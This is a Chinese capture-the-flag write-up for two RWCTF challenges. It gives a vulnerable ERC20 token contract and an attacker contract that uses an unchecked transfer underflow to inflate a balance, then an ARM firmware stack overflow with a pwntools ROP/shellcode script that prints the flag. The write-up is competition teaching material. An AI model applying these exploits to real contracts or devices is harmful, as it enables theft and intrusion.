跳跳糖
0x00 前言
在参加RWCTF正赛的同时也参加了体验赛,正赛还是一如既往的难度非常高,但也能非常勉强的看懂1-2个题了。正赛的区块链是一个类密码题,用数据结构做了些文章,体验赛整体难度较为简单。区块链主要考察阅读代码,同时也跟队友一起解决了一个IOT方向的赛题。这个IOT洞比较明显,也算是比较好利用的。
0x01 Blockchain Transfer
题目给出代码,是一个伪代币。
deployer.sol
pragma solidity ^0.6.6;
import "./erc20_fake.sol";
contract deployer {
FishmenToken public fishmenToken;
bool public isSvd;
constructor() public {
fishmenToken = new FishmenToken();
}
function solve() public returns (bool) {
require(fishmenToken.balanceOf(msg.sender) > 100,"token balance < 100");
isSvd = true;
}
function isSolved() public view returns (bool) {
return isSvd;
}
}
erc20_fake.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.6.6;
abstract contract Context {
function _msgSender() internal view virtual returns (address payable) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
}
interface IERC20 {
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount)
external
returns (bool);
function allowance(address owner, address spender)
external
view
returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return mod(a, b, "SafeMath: modulo by zero");
}
function mod(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b != 0, errorMessage);
return a % b;
}
}
contract ERC20 is Context, IERC20 {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
uint8 private _decimals;
constructor(string memory name, string memory symbol) public {
_name = name;
_symbol = symbol;
_decimals = 18;
}
/**
* @dev Returns the name of the token.
*/
function name() public view returns (string memory) {
return _name;
}
function symbol() public view returns (string memory) {
return _symbol;
}
function decimals() public view returns (uint8) {
return _decimals;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view override returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}
function transfer(address recipient, uint256 amount)
public
virtual
override
returns (bool)
{
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender)
public
view
virtual
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
virtual
override
returns (bool)
{
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
_approve(
sender,
_msgSender(),
_allowances[sender][_msgSender()].sub(
amount,
"ERC20: transfer amount exceeds allowance"
)
);
return true;
}
function increaseAllowance(address spender, uint256 addedValue)
public
virtual
returns (bool)
{
_approve(
_msgSender(),
spender,
_allowances[_msgSender()][spender].add(addedValue)
);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue)
public
virtual
returns (bool)
{
_approve(
_msgSender(),
spender,
_allowances[_msgSender()][spender].sub(
subtractedValue,
"ERC20: decreased allowance below zero"
)
);
return true;
}
function _transfer(
address sender,
address recipient,
uint256 amount
) internal virtual {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
_balances[sender] = _balances[sender] - amount;
_balances[recipient] = _balances[recipient] + amount;
emit Transfer(sender, recipient, amount);
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply = _totalSupply.add(amount);
_balances[account] = _balances[account].add(amount);
emit Transfer(address(0), account, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_balances[account] = _balances[account].sub(
amount,
"ERC20: burn amount exceeds balance"
);
_totalSupply = _totalSupply.sub(amount);
emit Transfer(account, address(0), amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _setupDecimals(uint8 decimals_) internal {
_decimals = decimals_;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() internal {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
contract FishmenToken is ERC20("FishmenToken", "FMT"), Ownable {
function mint(address _to, uint256 _amount) public onlyOwner {
_mint(_to, _amount);
}
function burn(address _from, uint256 _amount) public {
_burn(_from, _amount);
}
}
我们可以看到需要满足的条件就是调用者的代币 大于100
然后主要看的就是实现代币的这个合约。
我们可以看到这里实现了 Safemath相关的一个库。可以完全跳过,但我们注意到,在erc20的代币合约里面唯独
__transfer中没使用这种safemath,而且这里也没有对传输eth做任何的限制,没有提前检查是否有足够的eth。那么这里很轻松的可以出现整数溢出。但是这是一个internal的方法,找一下能调用他的external
可以看到转账金额和地址都为我们所控制,那么就能实现转账人的代币金额下溢,使其大于100.
poc如下:
pragma solidity ^0.6.6;
import "./erc20_fake.sol";
import "./deployer.sol";
contract hacker{
address public setup=0xAF21dB5BAD07ECb958B3DE98DD6023bb4fbA816C;
deployer A=deployer(setup);
address public target=address(A.fishmenToken());
bool public success;
FishmenToken B=FishmenToken(target);
constructor() public{
B.transfer(setup,200);
success=A.solve();
}
}
然后把constructor的bytecode部署到私链上就可以了。
0x02 the Real Menu Challenge
算是我入门IOT的一个题,赛时@PTT0完成了整个漏洞利用,我就打打下手修了修固件。不过也学到了很多。是该题目的唯一解。
题目给出了固件 以及qemu的启动命令。IDA无法直接分析固件得到程序的入口地址。所以我们需要手动来改。赛时我们找到了一篇文章,
https://wemp.app/posts/68625bf7-1df0-4379-9b54-a6c240c0a8fa
利用其中的相关手法修改后能够得到大体的程序,
但是现在还没有程序入口地址,所以引用数据的位置都是错误的。后续通过他switch中的跳转函数表算偏移大致修了一下,Rebase Segement后成功把数据段基本也修上了。
赛后讲课师傅使用了qemu远程调试的方式直接确定数据段,非常快捷。。。学到了。
然后就开始挖洞了。
首先可以看到这些选项,menu中打印了相关的内容。
但是input_choice中我们可以轻松的看到,
他的v1大小为20,限制读入256,存在栈溢出。且这个跑在kernel上,没有任何的保护,我们考虑直接ROP打印flag。
flag在kernel中的地址为。
flag_addr=0x60022E60
puts_addr=0x60020698
填充大小为0x14。
arm架构 利用puts打印 flag就可以了。
arm的函数调用时,如果参数数目小于4,使用寄存器r0-r3进行传递
所以设置
ldr r0, =0x60022E60
ldr pc, =0x60020698
这样就可以成功打印出flag了。
我利用了比较笨的办法调试。
然后编写相关的poc 在choose返回的时候下断看就可以了。
在脚本里起qemu进程,然后用gdb远程连接。
我们一直缓冲区大小20,然后覆盖返回地址,因为他没有任何保护,我直接ret2shellcode实现puts(flag)。
下断到0x600104FC
栈上数据已经能看到了。我们让其直接跳转到
就可以往下执行了,后面虽然会因为跳转在栈上无法继续运行直接错误退出,但是我们只要能够拿到flag就足够了。
脚本如下:
from pwn import *
p=process('qemu-system-arm -m 64 -s -S -nographic -machine vexpress-a9 -kernel rtos.bin',shell=True)
context.log_level='debug'
context.arch='arm'
shellcode="""
ldr r0, =0x60022E60
ldr pc, =0x60020698
"""
p.recvuntil('change screen img\n')
payload='a'*0x14+p32(0x6045a518)+asm(shellcode)
p.sendline(payload)
p.interactive()
感谢帮我学习和赛时修文件的 Xkaneiki、PTT0、X1ng。
